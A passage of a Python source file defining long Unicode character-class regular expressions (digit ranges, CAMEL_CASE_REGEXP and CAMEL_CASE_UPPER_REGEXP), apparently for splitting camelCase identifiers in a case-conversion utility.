u0A66-\u0A6F\u0AE6-\u0AEF\u0B66-\u0B6F\u0B72-\u0B77\u0BE6-\u0BF2\u0C66-\u0C6F\u0C78-\u0C7E\u0CE6-\u0CEF\u0D66-\u0D75\u0DE6-\u0DEF\u0E50-\u0E59\u0ED0-\u0ED9\u0F20-\u0F33\u1040-\u1049\u1090-\u1099\u1369-\u137C\u16EE-\u16F0\u17E0-\u17E9\u17F0-\u17F9\u1810-\u1819\u1946-\u194F\u19D0-\u19DA\u1A80-\u1A89\u1A90-\u1A99\u1B50-\u1B59\u1BB0-\u1BB9\u1C40-\u1C49\u1C50-\u1C59\u2070\u2074-\u2079\u2080-\u2089\u2150-\u2182\u2185-\u2189\u2460-\u249B\u24EA-\u24FF\u2776-\u2793\u2CFD\u3007\u3021-\u3029\u3038-\u303A\u3192-\u3195\u3220-\u3229\u3248-\u324F\u3251-\u325F\u3280-\u3289\u32B1-\u32BF\uA620-\uA629\uA6E6-\uA6EF\uA830-\uA835\uA8D0-\uA8D9\uA900-\uA909\uA9D0-\uA9D9\uA9F0-\uA9F9\uAA50-\uAA59\uABF0-\uABF9\uFF10-\uFF19]+')
CAMEL_CASE_REGEXP = re.compile(r'([a-z\xB5\xDF-\xF6\xF8-\xFF\u0101\u0103\u0105\u0107\u0109\u010B\u010D\u010F\u0111\u0113\u0115\u0117\u0119\u011B\u011D\u011F\u0121\u0123\u0125\u0127\u0129\u012B\u012D\u012F\u0131\u0133\u0135\u0137\u0138\u013A\u013C\u013E\u0140\u0142\u0144\u0146\u0148\u0149\u014B\u014D\u014F\u0151\u0153\u0155\u0157\u0159\u015B\u015D\u015F\u0161\u0163\u0165\u0167\u0169\u016B\u016D\u016F\u0171\u0173\u0175\u0177\u017A\u017C\u017E-\u0180\u0183\u0185\u0188\u018C\u018D\u0192\u0195\u0199-\u019B\u019E\u01A1\u01A3\u01A5\u01A8\u01AA\u01AB\u01AD\u01B0\u01B4\u01B6\u01B9\u01BA\u01BD-\u01BF\u01C6\u01C9\u01CC\u01CE\u01D0\u01D2\u01D4\u01D6\u01D8\u01DA\u01DC\u01DD\u01DF\u01E1\u01E3\u01E5\u01E7\u01E9\u01EB\u01ED\u01EF\u01F0\u01F3\u01F5\u01F9\u01FB\u01FD\u01FF\u0201\u0203\u0205\u0207\u0209\u020B\u020D\u020F\u0211\u0213\u0215\u0217\u0219\u021B\u021D\u021F\u0221\u0223\u0225\u0227\u0229\u022B\u022D\u022F\u0231\u0233-\u0239\u023C\u023F\u0240\u0242\u0247\u0249\u024B\u024D\u024F-\u0293\u0295-\u02AF\u0371\u0373\u0377\u037B-\u037D\u0390\u03AC-\u03CE\u03D0\u03D1\u03D5-\u03D7\u03D9\u03DB\u03DD\u03DF\u03E1\u03E3\u03E5\u03E7\u03E9\u03EB\u03ED\u03EF-\u03F3\u03F5\u03F8\u03FB\u03FC\u0430-\u045F\u0461\u0463\u0465\u0467\u0469\u046B\u046D\u046F\u0471\u0473\u0475\u0477\u0479\u047B\u047D\u047F\u0481\u048B\u048D\u048F\u0491\u0493\u0495\u0497\u0499\u049B\u049D\u049F\u04A1\u04A3\u04A5\u04A7\u04A9\u04AB\u04AD\u04AF\u04B1\u04B3\u04B5\u04B7\u04B9\u04BB\u04BD\u04BF\u04C2\u04C4\u04C6\u04C8\u04CA\u04CC\u04CE\u04CF\u04D1\u04D3\u04D5\u04D7\u04D9\u04DB\u04DD\u04DF\u04E1\u04E3\u04E5\u04E7\u04E9\u04EB\u04ED\u04EF\u04F1\u04F3\u04F5\u04F7\u04F9\u04FB\u04FD\u04FF\u0501\u0503\u0505\u0507\u0509\u050B\u050D\u050F\u0511\u0513\u0515\u0517\u0519\u051B\u051D\u051F\u0521\u0523\u0525\u0527\u0529\u052B\u052D\u052F\u0561-\u0587\u13F8-\u13FD\u1D00-\u1D2B\u1D6B-\u1D77\u1D79-\u1D9A\u1E01\u1E03\u1E05\u1E07\u1E09\u1E0B\u1E0D\u1E0F\u1E11\u1E13\u1E15\u1E17\u1E19\u1E1B\u1E1D\u1E1F\u1E21\u1E23\u1E25\u1E27\u1E29\u1E2B\u1E2D\u1E2F\u1E31\u1E33\u1E35\u1E37\u1E39\u1E3B\u1E3D\u1E3F\u1E41\u1E43\u1E45\u1E47\u1E49\u1E4B\u1E4D\u1E4F\u1E51\u1E53\u1E55\u1E57\u1E59\u1E5B\u1E5D\u1E5F\u1E61\u1E63\u1E65\u1E67\u1E69\u1E6B\u1E6D\u1E6F\u1E71\u1E73\u1E75\u1E77\u1E79\u1E7B\u1E7D\u1E7F\u1E81\u1E83\u1E85\u1E87\u1E89\u1E8B\u1E8D\u1E8F\u1E91\u1E93\u1E95-\u1E9D\u1E9F\u1EA1\u1EA3\u1EA5\u1EA7\u1EA9\u1EAB\u1EAD\u1EAF\u1EB1\u1EB3\u1EB5\u1EB7\u1EB9\u1EBB\u1EBD\u1EBF\u1EC1\u1EC3\u1EC5\u1EC7\u1EC9\u1ECB\u1ECD\u1ECF\u1ED1\u1ED3\u1ED5\u1ED7\u1ED9\u1EDB\u1EDD\u1EDF\u1EE1\u1EE3\u1EE5\u1EE7\u1EE9\u1EEB\u1EED\u1EEF\u1EF1\u1EF3\u1EF5\u1EF7\u1EF9\u1EFB\u1EFD\u1EFF-\u1F07\u1F10-\u1F15\u1F20-\u1F27\u1F30-\u1F37\u1F40-\u1F45\u1F50-\u1F57\u1F60-\u1F67\u1F70-\u1F7D\u1F80-\u1F87\u1F90-\u1F97\u1FA0-\u1FA7\u1FB0-\u1FB4\u1FB6\u1FB7\u1FBE\u1FC2-\u1FC4\u1FC6\u1FC7\u1FD0-\u1FD3\u1FD6\u1FD7\u1FE0-\u1FE7\u1FF2-\u1FF4\u1FF6\u1FF7\u210A\u210E\u210F\u2113\u212F\u2134\u2139\u213C\u213D\u2146-\u2149\u214E\u2184\u2C30-\u2C5E\u2C61\u2C65\u2C66\u2C68\u2C6A\u2C6C\u2C71\u2C73\u2C74\u2C76-\u2C7B\u2C81\u2C83\u2C85\u2C87\u2C89\u2C8B\u2C8D\u2C8F\u2C91\u2C93\u2C95\u2C97\u2C99\u2C9B\u2C9D\u2C9F\u2CA1\u2CA3\u2CA5\u2CA7\u2CA9\u2CAB\u2CAD\u2CAF\u2CB1\u2CB3\u2CB5\u2CB7\u2CB9\u2CBB\u2CBD\u2CBF\u2CC1\u2CC3\u2CC5\u2CC7\u2CC9\u2CCB\u2CCD\u2CCF\u2CD1\u2CD3\u2CD5\u2CD7\u2CD9\u2CDB\u2CDD\u2CDF\u2CE1\u2CE3\u2CE4\u2CEC\u2CEE\u2CF3\u2D00-\u2D25\u2D27\u2D2D\uA641\uA643\uA645\uA647\uA649\uA64B\uA64D\uA64F\uA651\uA653\uA655\uA657\uA659\uA65B\uA65D\uA65F\uA661\uA663\uA665\uA667\uA669\uA66B\uA66D\uA681\uA683\uA685\uA687\uA689\uA68B\uA68D\uA68F\uA691\uA693\uA695\uA697\uA699\uA69B\uA723\uA725\uA727\uA729\uA72B\uA72D\uA72F-\uA731\uA733\uA735\uA737\uA739\uA73B\uA73D\uA73F\uA741\uA743\uA745\uA747\uA749\uA74B\uA74D\uA74F\uA751\uA753\uA755\uA757\uA759\uA75B\uA75D\uA75F\uA761\uA763\uA765\uA767\uA769\uA76B\uA76D\uA76F\uA771-\uA778\uA77A\uA77C\uA77F\uA781\uA783\uA785\uA787\uA78C\uA78E\uA791\uA793-\uA795\uA797\uA799\uA79B\uA79D\uA79F\uA7A1\uA7A3\uA7A5\uA7A7\uA7A9\uA7B5\uA7B7\uA7FA\uAB30-\uAB5A\uAB60-\uAB65\uAB70-\uABBF\uFB00-\uFB06\uFB13-\uFB17\uFF41-\uFF5A0-9\xB2\xB3\xB9\xBC-\xBE\u0660-\u0669\u06F0-\u06F9\u07C0-\u07C9\u0966-\u096F\u09E6-\u09EF\u09F4-\u09F9\u0A66-\u0A6F\u0AE6-\u0AEF\u0B66-\u0B6F\u0B72-\u0B77\u0BE6-\u0BF2\u0C66-\u0C6F\u0C78-\u0C7E\u0CE6-\u0CEF\u0D66-\u0D75\u0DE6-\u0DEF\u0E50-\u0E59\u0ED0-\u0ED9\u0F20-\u0F33\u1040-\u1049\u1090-\u1099\u1369-\u137C\u16EE-\u16F0\u17E0-\u17E9\u17F0-\u17F9\u1810-\u1819\u1946-\u194F\u19D0-\u19DA\u1A80-\u1A89\u1A90-\u1A99\u1B50-\u1B59\u1BB0-\u1BB9\u1C40-\u1C49\u1C50-\u1C59\u2070\u2074-\u2079\u2080-\u2089\u2150-\u2182\u2185-\u2189\u2460-\u249B\u24EA-\u24FF\u2776-\u2793\u2CFD\u3007\u3021-\u3029\u3038-\u303A\u3192-\u3195\u3220-\u3229\u3248-\u324F\u3251-\u325F\u3280-\u3289\u32B1-\u32BF\uA620-\uA629\uA6E6-\uA6EF\uA830-\uA835\uA8D0-\uA8D9\uA900-\uA909\uA9D0-\uA9D9\uA9F0-\uA9F9\uAA50-\uAA59\uABF0-\uABF9\uFF10-\uFF19])([A-Z\xC0-\xD6\xD8-\xDE\u0100\u0102\u0104\u0106\u0108\u010A\u010C\u010E\u0110\u0112\u0114\u0116\u0118\u011A\u011C\u011E\u0120\u0122\u0124\u0126\u0128\u012A\u012C\u012E\u0130\u0132\u0134\u0136\u0139\u013B\u013D\u013F\u0141\u0143\u0145\u0147\u014A\u014C\u014E\u0150\u0152\u0154\u0156\u0158\u015A\u015C\u015E\u0160\u0162\u0164\u0166\u0168\u016A\u016C\u016E\u0170\u0172\u0174\u0176\u0178\u0179\u017B\u017D\u0181\u0182\u0184\u0186\u0187\u0189-\u018B\u018E-\u0191\u0193\u0194\u0196-\u0198\u019C\u019D\u019F\u01A0\u01A2\u01A4\u01A6\u01A7\u01A9\u01AC\u01AE\u01AF\u01B1-\u01B3\u01B5\u01B7\u01B8\u01BC\u01C4\u01C7\u01CA\u01CD\u01CF\u01D1\u01D3\u01D5\u01D7\u01D9\u01DB\u01DE\u01E0\u01E2\u01E4\u01E6\u01E8\u01EA\u01EC\u01EE\u01F1\u01F4\u01F6-\u01F8\u01FA\u01FC\u01FE\u0200\u0202\u0204\u0206\u0208\u020A\u020C\u020E\u0210\u0212\u0214\u0216\u0218\u021A\u021C\u021E\u0220\u0222\u0224\u0226\u0228\u022A\u022C\u022E\u0230\u0232\u023A\u023B\u023D\u023E\u0241\u0243-\u0246\u0248\u024A\u024C\u024E\u0370\u0372\u0376\u037F\u0386\u0388-\u038A\u038C\u038E\u038F\u0391-\u03A1\u03A3-\u03AB\u03CF\u03D2-\u03D4\u03D8\u03DA\u03DC\u03DE\u03E0\u03E2\u03E4\u03E6\u03E8\u03EA\u03EC\u03EE\u03F4\u03F7\u03F9\u03FA\u03FD-\u042F\u0460\u0462\u0464\u0466\u0468\u046A\u046C\u046E\u0470\u0472\u0474\u0476\u0478\u047A\u047C\u047E\u0480\u048A\u048C\u048E\u0490\u0492\u0494\u0496\u0498\u049A\u049C\u049E\u04A0\u04A2\u04A4\u04A6\u04A8\u04AA\u04AC\u04AE\u04B0\u04B2\u04B4\u04B6\u04B8\u04BA\u04BC\u04BE\u04C0\u04C1\u04C3\u04C5\u04C7\u04C9\u04CB\u04CD\u04D0\u04D2\u04D4\u04D6\u04D8\u04DA\u04DC\u04DE\u04E0\u04E2\u04E4\u04E6\u04E8\u04EA\u04EC\u04EE\u04F0\u04F2\u04F4\u04F6\u04F8\u04FA\u04FC\u04FE\u0500\u0502\u0504\u0506\u0508\u050A\u050C\u050E\u0510\u0512\u0514\u0516\u0518\u051A\u051C\u051E\u0520\u0522\u0524\u0526\u0528\u052A\u052C\u052E\u0531-\u0556\u10A0-\u10C5\u10C7\u10CD\u13A0-\u13F5\u1E00\u1E02\u1E04\u1E06\u1E08\u1E0A\u1E0C\u1E0E\u1E10\u1E12\u1E14\u1E16\u1E18\u1E1A\u1E1C\u1E1E\u1E20\u1E22\u1E24\u1E26\u1E28\u1E2A\u1E2C\u1E2E\u1E30\u1E32\u1E34\u1E36\u1E38\u1E3A\u1E3C\u1E3E\u1E40\u1E42\u1E44\u1E46\u1E48\u1E4A\u1E4C\u1E4E\u1E50\u1E52\u1E54\u1E56\u1E58\u1E5A\u1E5C\u1E5E\u1E60\u1E62\u1E64\u1E66\u1E68\u1E6A\u1E6C\u1E6E\u1E70\u1E72\u1E74\u1E76\u1E78\u1E7A\u1E7C\u1E7E\u1E80\u1E82\u1E84\u1E86\u1E88\u1E8A\u1E8C\u1E8E\u1E90\u1E92\u1E94\u1E9E\u1EA0\u1EA2\u1EA4\u1EA6\u1EA8\u1EAA\u1EAC\u1EAE\u1EB0\u1EB2\u1EB4\u1EB6\u1EB8\u1EBA\u1EBC\u1EBE\u1EC0\u1EC2\u1EC4\u1EC6\u1EC8\u1ECA\u1ECC\u1ECE\u1ED0\u1ED2\u1ED4\u1ED6\u1ED8\u1EDA\u1EDC\u1EDE\u1EE0\u1EE2\u1EE4\u1EE6\u1EE8\u1EEA\u1EEC\u1EEE\u1EF0\u1EF2\u1EF4\u1EF6\u1EF8\u1EFA\u1EFC\u1EFE\u1F08-\u1F0F\u1F18-\u1F1D\u1F28-\u1F2F\u1F38-\u1F3F\u1F48-\u1F4D\u1F59\u1F5B\u1F5D\u1F5F\u1F68-\u1F6F\u1FB8-\u1FBB\u1FC8-\u1FCB\u1FD8-\u1FDB\u1FE8-\u1FEC\u1FF8-\u1FFB\u2102\u2107\u210B-\u210D\u2110-\u2112\u2115\u2119-\u211D\u2124\u2126\u2128\u212A-\u212D\u2130-\u2133\u213E\u213F\u2145\u2183\u2C00-\u2C2E\u2C60\u2C62-\u2C64\u2C67\u2C69\u2C6B\u2C6D-\u2C70\u2C72\u2C75\u2C7E-\u2C80\u2C82\u2C84\u2C86\u2C88\u2C8A\u2C8C\u2C8E\u2C90\u2C92\u2C94\u2C96\u2C98\u2C9A\u2C9C\u2C9E\u2CA0\u2CA2\u2CA4\u2CA6\u2CA8\u2CAA\u2CAC\u2CAE\u2CB0\u2CB2\u2CB4\u2CB6\u2CB8\u2CBA\u2CBC\u2CBE\u2CC0\u2CC2\u2CC4\u2CC6\u2CC8\u2CCA\u2CCC\u2CCE\u2CD0\u2CD2\u2CD4\u2CD6\u2CD8\u2CDA\u2CDC\u2CDE\u2CE0\u2CE2\u2CEB\u2CED\u2CF2\uA640\uA642\uA644\uA646\uA648\uA64A\uA64C\uA64E\uA650\uA652\uA654\uA656\uA658\uA65A\uA65C\uA65E\uA660\uA662\uA664\uA666\uA668\uA66A\uA66C\uA680\uA682\uA684\uA686\uA688\uA68A\uA68C\uA68E\uA690\uA692\uA694\uA696\uA698\uA69A\uA722\uA724\uA726\uA728\uA72A\uA72C\uA72E\uA732\uA734\uA736\uA738\uA73A\uA73C\uA73E\uA740\uA742\uA744\uA746\uA748\uA74A\uA74C\uA74E\uA750\uA752\uA754\uA756\uA758\uA75A\uA75C\uA75E\uA760\uA762\uA764\uA766\uA768\uA76A\uA76C\uA76E\uA779\uA77B\uA77D\uA77E\uA780\uA782\uA784\uA786\uA78B\uA78D\uA790\uA792\uA796\uA798\uA79A\uA79C\uA79E\uA7A0\uA7A2\uA7A4\uA7A6\uA7A8\uA7AA-\uA7AD\uA7B0-\uA7B4\uA7B6\uFF21-\uFF3A])')
CAMEL_CASE_UPPER_REGEXP = re.compile(r'([A-Z\xC0-\xD6\xD8-\xDE\u0100\u0102\u0104\u0106\u0108\u010A\u010C\u010E\u0110\u0112\u0114\u0116\u0118\u011A\u011C\u011E\u0120\u0122\u0124\u0126\u0128\u012A\u012C\u012E\u0130\u0132\u0134\u0136\u0139\u013B\u013D\u013F\u0141\u0143\u0145\u0147\u014A\u014C\u014E\u0150\u0152\u0154\u0156\u0158\u015A\u015C\u015E\u0160\u0162\u0164\u0166\u0168\u016A\u016C\u016E\u0170\u0172\u0174\u0176\u0178\u0179\u017B\u017D\u0181\u0182\u0184\u0186\u0187\u0189-\u018B\u018E-\u0191\u0193\u0194\u0196-\u0198\u019C\u019D\u019F\u01A0\u01A2\u01A4\u01A6\u01A7\u01A9\u01AC\u01AE\u01AF\u01B1-\u01B3\u01B5\u01B7\u01B8\u01BC\u01C4\u01C7\u01CA\u01CD\u01CF\u01D1\u01D3\u01D5\u01D7\u01D9\u01DB\u01DE\u01E0\u01E2\u01E4\u01E6\u01E8\u01EA\u01EC\u01EE\u01F1\u01F4\u01F6-\u01F8\u01FA\u01FC\u01FE\u0200\u0202\u0204\u0206\u0208\u020A\u020C\u020E\u0210\u0212\u0214\u0216\u0218\u021A\u021C\u021E\u0220\u0222\u0224\u0226\u0228\u022A\u022C\u022E\u0230\u0232\u023A\u023B\u023D\u023E\u0241\u0243-\u0246\u0248\u024A\u024C\u024E\u0370\u0372\u0376\u037F\u0386\u0388-\u038A\u038C\u038E\u038F\u0391-\u03A1\u03A3-\u03AB\u03CF\u03D2-\u03D4\u03D8\u03DA\u03DC\u03DE\u03E0\u03E2\u03E4\u03E6\u03E8\u03EA\u03EC\u03EE\u03F4\u03F7\u03F9\u03FA\u03FD-\u042F\u0460\u0462\u0464\u0466\u0468\u046A\u046C\u046E\u0470\u0472\u0474\u0476\u0478\u047A\u047C\u047E\u0480\u048A\u048C\u048E\u0490\u0492\u0494\u0496\u0498\u049A\u049C\u049E\u04A0\u04A2\u04A4\u04A6\u04A8\u04AA\u04AC\u04AE\u04B0\u04B2\u04B4\u04B6\u04B8\u04BA\u04BC\u04BE\u04C0\u04C1\u04C3\u04C5\u04C7\u04C9\u04CB\u04CD\u04D0\u04D2\u04D4\u04D6\u04D8\u04DA\u04DC\u04DE\u04E0\u04E2\u04E4\u04E6\u04E8\u04EA\u04EC\u04EE\u04F0\u04F2\u04F4\u04F6\u04F8\u04FA\u04FC\u04FE\u0500\u0502\u0504\u0506\u0508\u050A\u050C\u050E\u0510\u0512\u0514\u0516\u0518\u051A\u051C\u051E\u0520\u0522\u0524\u0526\u0528\u052A\u052C\u052E\u0531-\u0556\u10A0-\u10C5\u10C7\u10CD\u13A0-\u13F5\u1E00\u1E02\u1E04\u1E06\u1E08\u1E0A\u1E0C\u1E0E\u1E10\u1E12\u1E14\u1E16\u1E18\u1E1A\u1E1C\u1E1E\u1E20\u1E22\u1E24\u1E26\u1E28\u1E2A\u1E2C\u1E2E\u1E30\u1E32\u1E34\u1E36\u1E38\u1E3A\u1E3C\u1E3E\u1E40\u1E42\u1E44\u1E46\u1E48\u1E4A\u1E4C\u1E4E\u1E50\u1E52\u1E54\u1E56\u1E58\u1E5A\u1E5C\u1E5E\u1E60\u1E62\u1E64\u1E66\u1E68\u1E6A\u1E6C\u1E6E\u1E70\u1E72\u1E74\u1E76\u1E78\u1E7A\u1E7C\u1E7E\u1E80\u1E82\u1E84\u1E86\u1E88\u1E8A\u1E8C\u1E8E\u1E90\u1E92\u1E94\u1E9E\u1EA0\u1EA2\u1EA4\u1EA6\u1EA8\u1EAA\u1EAC\u1EAE\u1EB0\u1EB2\u1EB4\u1EB6\u1EB8\u1EBA\u1EBC\u1EBE\u1EC0\u1EC2\u1EC4\u1EC6\u1EC8\u1ECA\u1ECC\u1ECE\u1ED0\u1ED2\u1ED4\u1ED6\u1ED8\u1EDA\u1EDC\u1EDE\u1EE0\u1EE2\u1EE4\u1EE6\u1EE8\u1EEA\u1EEC\u1EEE\u1EF0\u1EF2\u1EF4\u1EF6\u1EF8\u1EFA\u1EFC\u1EFE\u1F08-\u1F0F\u1F18-\u1F1D\u1F28-\u1F2F\u1F38-\u1F3F\u1F48-\u1F4D\u1F59\u1F5B\u1F5D\u1F5F\u1F68-\u1F6F\u1FB8-\u1FBB\u1FC8-\u1FCB\u1FD8-\u1FDB\u1FE8-\u1FEC\u1FF8-\u1FFB\u2102\u2107\u210B-\u210D\u2110-\u2112\u2115\u2119-\u211D\u2124\u2126\u2128\u212A-\u212D\u2130-\u2133\u213E\u213F\u2145\u2183\u2C00-\u2C2E\u2C60\u2C62-\u2C64\u2C67\u2C69\u2C6B\u2C6D-\u2C70\u2C72\u2C75\u2C7E-\u2C80\u2C82\u2C84\u2C86\u2C88\u2C8A\u2C8C\u2C8E\u2C90\u2C92\u2C94\u2C96\u2C98\u2C9A\u2C9C\u2C9E\u2CA0\u2CA2\u2CA4\u2CA6\u2CA8\u2CAA\u2CAC\u2CAE\u2CB0\u2CB2\u2CB4\u2CB6\u2CB8\u2CBA\u2CBC\u2CBE\u2CC0\u2CC2\u2CC4\u2CC6\u2CC8\u2CCA\u2CCC\u2CCE\u2CD0\u2CD2\u2CD4\u2CD6\u2CD8\u2CDA\u2CDC\u2CDE\u2CE0\u2CE2\u2CEB\u2CED\u2CF2\uA640\uA642\uA644\uA646\uA648\uA64A\uA64C\uA64E\uA650\uA652\uA654\uA656\uA658\uA65A\uA65C\uA65E\uA660\uA662\uA664\uA666\uA668\uA66A\uA66C\uA680\uA682\uA684\uA686\uA688\uA68A\uA68C\uA68E\uA690\uA692\uA694\uA696\uA698\uA69A\uA722\uA724\uA726\uA728\uA72A\uA72C\uA72E\uA732\uA734\uA736\uA738\uA73A\uA73C\uA73E\uA740\uA742\uA744\uA746\uA748\uA74A\uA74C\uA74E\uA750\uA752\uA754\uA756\uA758\uA75A\uA75C\uA75E\uA760\uA762\uA764\uA766\uA768\uA76A\uA76C\uA76E\uA779\uA77B\uA77D\uA77E\uA780\uA782\uA784\uA786\uA78B\uA78D\uA790\uA792\uA796\uA798\uA79A\uA79C\uA79E\uA7A0\uA7A2\uA7A4\uA7A6\uA7A8\uA7AA-\uA7AD\uA7B0-\uA7B4\uA7B6\uFF21-\uFF3A]+)([A-Z\xC0-\xD6\xD8-\xDE\u0100\u0102\u0104\u0106\u0108\u010A\u010C\u010E\u0110\u0112\u0114\u0116\u0118\u011A\u011C\u011E\u0120\u0122\u0124\u0126\u0128\u012A\u012C\u012E\u0130\u0132\u0134\u0136\u0139\u013B\u013D\u013F\u0141\u0143\u0145\u0147\u014A\u014C\u014E\u0150\u0152\u0154\u0156\u0158\u015A\u015C\u015E\u0160\u0162\u0164\u0166\u0168\u016A\u016C\u016E\u0170\u0172\u0174\u0176\u0178\u0179\u017B\u017D\u0181\u0182\u0184\u0186\u0187\u0189-\u018B\u018E-\u0191\u0193\u0194\u0196-\u0198\u019C\u019D\u019F\u01A0\u01A2\u01A4\u01A6\u01A7\u01A9\u01AC\u01AE\u01AF\u01B1-\u01B3\u01B5\u01B7\u01B8\u01BC\u01C4\u01C7\u01CA\u01CD\u01CF\u01D1\u01D3\u01D5\u01D7\u01D9\u01DB\u01DE\u01E0\u01E2\u01E4\u01E6\u01E8\u01EA\u01EC\u01EE\u01F1\u01F4\u01F6-\u01F8\u01FA\u01FC\u01FE\u0200\u0202\u0204\u0206\u0208\u020A\u020C\u020E\u0210\u0212\u0214\u0216\u0218\u021A\u021C\u021E\u0220\u0222\u0224\u0226\u0228\u022A\u022C\u022E\u0230\u0232\u023A\u023B\u023D\u023E\u0241\u0243-\u0246\u0248\u024A\u024C\u024E\u0370\u0372\u0376\u037F\u0386\u0388-\u038A\u038C\u038E\u038F\u0391-\u03A1\u03A3-\u03AB\u03CF\u03D2-\u03D4\u03D8\u03DA\u03DC\u03DE\u03E0\u03E2\u03E4\u03E6\u03E8\u03EA\u03EC\u03EE\u03F4\u03F7\u03F9\u03FA\u03FD-\u042F\u0460\u0462\u0464\u0466\u0468\u046A\u046C\u046E\u0470\u0472\u0474\u0476\u0478\u047A\u047C\u047E\u0480\u048A\u048C\u048E\u0490\u0492\u0494\u0496\u0498\u049A\u049C\u049E\u04A0\u04A2\u04A4\u04A6\u04A8\u04AA\u04AC\u04AE\u04B0\u04B2\u04B4\u04B6\u04B8\u04BA\u04BC\u04BE\u04C0\u04C1\u04C3\u04C5\u04C7\u04C9\u04CB\u04CD\u04D0\u04D2\u04D4\u04D6\u04D8\u04DA\u04DC\u04DE\u04E0\u04E2\u04E4\u04E6\u04E8\u04EA\u04EC\u04EE\u04F0\u04F2\u04F4\u04F6\u04F8\u04FA\u04FC\u04FE\u0500\u0502\u0504\u0506\u0508\u050A\u050C\u050E\u0510\u0512\u0514\u0516\u0518\u051A\u051C\u051E\u0520\u0522\u0524\u0526\u0528\u052A\u052C\u052E\u0531-\u0556\u10A0-\u10C5\u10C7\u10CD\u13A0-\u13F5\u1E00\u1E02\u1E04\u1E06\u1E08\u1E0A\u1E0C\u1E0E\u1E10\u1E12\u1E14\u1E16\u1E18\u1E1A\u1E1C\u1E1E\u1E20\u1E22\u1E24\u1E26\u1E28\u1E2A\u1E2C\u1E2E\u1E30\u1E32\u1E34\u1E36\u1E38\u1E3A\u1E3C\u1E3E\u1E40\u1E42\u1E44\u1E46\u1E48\u1E4A\u1E4C\u1E4E\u1E50\u1E52\u1E54\u1E56\u1E58\u1E5A\u1E5C\u1E5E\u1E60\u1E62\u1E64\u1E66\u1E68\u1E6A\u1E6C\u1E6E\u1E70\u1E72\u1E74\u1E76\u1E78\u1E7A\u1E7C\u1E7E\u1E80\u1E82\u1E84\u1E86\u1E88\u1E8A\u1E8C\u1E8E\u1E90\u1E92\u1E94\u1E9E\u1EA0\u1EA2\u1EA4\u1EA6\u1EA8\u1EAA\u1EAC\u1EAE\u1EB0\u1EB2\u1EB4\u1EB6\u1EB8\u1EBA\u1EBC\u1EBE\u1EC0\u1EC2\u1EC4\u1EC6\u1EC8\u1ECA\u1ECC\u1ECE\u1ED0\u1ED2\u1ED4\u1ED6\u1ED8\u1EDA\u1EDC\u1EDE\u1EE0\u1EE2\u1EE4\u1EE6\u1EE8\u1EEA\u1EEC\u1EEE\u1EF0\u1EF2\u1EF4\u1EF6\u1EF8\u1EFA\u1EFC\u1EFE\u1F08-\u1F0F\u1F18-\u1F1D\u1F28-\u1F2F\u1F38-\u1F3F\u1F48-\u1F4D\u1F59\u1F5B\u1F5D\u1F5F\u1F68-\u1F6F\u1FB8-\u1FBB\u1FC8-\u1FCB\u1FD8-\u1FDB\u1FE8-\u1FEC\u1FF8-\u1FFB\u2102\u2107\u210B-\u210D\u2110-\u2112\u2115\u2119-\u211D\u2124\u2126\u2128\u212A-\u212D\u2130-\u2133\u213E\u213F\u2145\u2183\u2C00-\u2C2E\u2C60\u2C62-\u2C64\u2C67\u2C69\u2C6B\u2C6D-\u2C70\u2C72\u2C75\u2C7E-\u2C80\u2C82\u2C84\u2C86\u2C88\u2C8A\u2C8C\u2C8E\u2C90\u2C92\u2C94\u2C96\u2C98\u2C9A\u2C9C\u2C9E\u2CA0\u2CA2\u2CA4\u2CA6\u2CA8\u2CAA\u2CAC\u2CAE\u2CB0\u2CB2\u2CB4\u2CB6\u2CB8\u2CBA\u2CBC\u2CBE\u2CC0\u2CC2\u2CC4\u2CC6\u2CC8\u2CCA\u2CCC\u2CCE\u2CD0\u2CD2\u2CD4\u2CD6\u2CD8\u2CDA\u2CDC\u2CDE\u2CE0\u2CE2\u2CEB\u2CED\u2CF2\uA640\uA642\uA644\uA646\uA648\uA64A\uA64C\uA64E\uA650\uA652\uA654\uA656\uA658\uA65A\uA65C\uA65E\uA660\uA662\uA664\uA666\uA668\uA66A\uA66C\uA680\uA682\uA684\uA686\uA688\uA68A\uA68C\uA68E\uA690\uA692\uA694\uA696\uA698\uA69A\uA722\uA724\uA726\uA728\uA72A\uA72C\uA72E\uA732\uA734\uA736\uA738\uA73A\uA73C\uA73E\uA740\uA742\uA744\uA746\uA748\uA74A\uA74C\uA74E\uA750\uA752\uA754\uA756\uA758\uA75A\uA75C\uA75E\uA760\uA762\uA764\uA766\uA768\uA76A\uA76C\uA76E\uA779\uA77B\uA77D\uA77E\uA780\uA782\uA784\uA786\uA78B\uA78D\uA790\uA792\uA796\uA798\uA79A\uA79C\uA79E\uA7A0\uA7A2\uA7A4\uA7A6\uA7A8\uA7AA-\uA7AD\uA7B0-\uA7B4\uA7B6\uFF21-\uFF3A][a-z\xB5\xDF-\xF6\xF8-\xFF\u0101\u0103\u0105\u0107\u0109\u010B\u010D\u010F\u0111\u0113\u0115\u0117\u0119\u011B\u011D\u011F\u0121\u0123\u0125\u0127\u0129\u012B\u012D\u012F\u0131\u0133\u0135\u0137\u0138\u013A\u013C\u013E\u0140\u0142\u0144\u0146\u0148\u0149\u014B\u014D\u014F\u0151\u0153\u0155\u0157\u0159\u015B\u015D\u015F\u0161\u0163\u0165\u0167\u0169\u016B\u016D\u016F\u0171\u0173\u0175\u0177\u017A\u017C\u017E-\u0180\u0183\u0185\u0188\u018C\u018D\u0192\u0195\u0199-\u019B\u019E\u01A1\u01A3\u01A5\u01A8\u01AA\u01AB\u01AD\u01B0\u01B4\u01B6\u01B9\u01BA\u01BD-\u01BF\u01C6\u01C9\u01CC\u01CE\u01D0\u01D2\u01D4\u01D6\u01D8\u01DA\u01DC\u01DD\u01DF\u01E1\u01E3\u01E5\u01E7\u01E9\u01EB\u01ED\u01EF\u01F0\u01F3\u01F5\u01F9\u01FB\u01FD\u01FF\u0201\u0203\u0205\u0207\u0209\u020B\u020D\u020F\u0211\u0213\u0215\u0217\u0219\u021B\u021D\u021F\u0221\u0223\u0225\u0227\u0229\u022B\u022D\u022F\u0231\u0233-\u0239\u023C\u023F\u0240\u0242\u0247\u0249\u024B\u024D\u024F-\u0293\u0295-\u02AF\u0371\u0373\u0377\u037B-\u037D\u0390\u03AC-\u03CE\u03D0\u03D1\u03D5-\u03D7\u03D9\u03DB\u03DD\u03DF\u03E1\u03E3\u03E5\u03E7\u03E9\u03EB\u03ED\u03EF-\u03F3\u03F5\u03F8\u03FB\u03FC\u0430-\u045F\u0461\u0463\u0465\u0467\u0469\u046B\u046D\u046F\u0471\u0473\u0475\u0477\u0479\u047B\u047D\u047F\u0481\u048B\u048D\u048F\